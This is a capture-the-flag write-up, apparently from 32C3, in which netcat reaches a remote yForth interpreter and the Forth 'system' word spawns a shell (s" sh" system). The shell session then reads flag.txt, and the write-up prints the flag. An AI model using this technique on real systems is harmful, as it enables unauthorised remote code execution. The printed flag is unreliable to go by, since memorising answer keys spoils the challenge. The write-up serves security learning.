Remote code execution with a code injection vulnerability in a Forth interpreter.
Challenge Description
Points
150
Description
Connect to 136.243.194.49:1024 and get a shell.
Solution
When we connect to the IP address given, we are greeted by a Forth interpreter.
$ nc 136.243.194.49 1024
yForth? v0.2 Copyright (C) 2012 Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
ls
[ls] error(2): unknown word.
1 .
1 ok
We can execute system commands in yForth with ‘system’ so we can get a shell pretty easily:
$ nc 136.243.194.49 1024
yForth? v0.2 Copyright (C) 2012 Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
s" sh" system
sh: 0: can't access tty; job control turned off
$
From here, we explore the file system and read the flag:
$ ls -la
total 120
drwxr-xr-x 2 root root 4096 Dec 27 18:26 .
drwxr-xr-x 3 root root 4096 Dec 23 18:06 ..
-rw-r--r-- 1 root root 220 Dec 23 18:06 .bash_logout
-rw-r--r-- 1 root root 3771 Dec 23 18:06 .bashrc
-rw-r--r-- 1 root root 38 Dec 26 22:48 flag.txt
-rw-r--r-- 1 root root 675 Dec 23 18:06 .profile
-rw-r--r-- 1 root root 2474 Dec 26 22:27 README.gpl
-rwxr-xr-x 1 root root 84 Dec 27 18:11 run.sh
-rwxr-xr-x 1 root root 86512 Dec 26 22:27 yforth
$ cat flag.txt
32C3_a8cfc6174adcb39b8d6dc361e888f17b
$
Flag: 32C3_a8cfc6174adcb39b8d6dc361e888f17b
Leave a Comment